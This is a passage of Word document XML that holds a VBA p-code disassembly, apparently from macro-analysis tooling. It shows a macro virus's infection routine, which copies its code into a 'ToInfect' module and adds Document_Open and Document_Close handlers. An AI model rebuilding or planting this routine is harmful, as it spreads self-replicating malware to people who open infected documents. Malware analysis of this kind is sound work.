        <w:t>' Line #55:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F39EB7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C8A74" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF851EB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B6CAE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F350D8D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>' Line #56:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155B8DB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A19336" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #57:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51993696" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x001C "Private Sub Document_Close()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD00CA1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181769F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB08E99" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B5F71" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall AddFromString 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69666A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #58:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188ACDB9" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002E430" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F8BED6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BDD076" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF32BF6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA6830" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ABE1F7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5108831E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9AED30" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #59:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A3BBB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2240FC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23EB65" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A7874" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBBD03C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C305C53" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36529D6A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DCD5E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C4B2C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall InsertLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C770E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #60:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C02409" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53334B57" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE377F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7503FCBE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503FDBC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #61:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7529E0BF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FFC37" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #62:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9BBB80" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774D819" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #63:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4892EC35" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477C7EC7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1863C0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B76CDA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7D891" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669BDF55" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D3A39D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46386872" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0BAFE8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446856F6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCE29F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EEE400" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD9FC2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D67B18" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #65:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D023D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8BB2AF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435292DB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D8A6A3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D9533" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #66:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD1CB81" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78BEA5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #67:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936B547" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x001B "Private Sub Document_Open()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D55004" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6B8099" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13312A94" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B1DB2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall AddFromString 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF1CC4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #68:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F62A5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE82CCE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680BC502" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691C667" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41752DBE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4768A113" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F82195" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D1624" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B721B8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #69:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719563FC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29BA14" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD44ABC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D43F45A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301E34E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A1389" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C2D57" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74096A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A2B29" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall InsertLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10767CEB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #70:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA2FF9D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04350560" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011BF777" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F13D90" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D39308" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #71:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC7774" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F81B1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #72:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F5A5C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A6D50" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #73:</w:t>
      </w:r>
    </w:p>
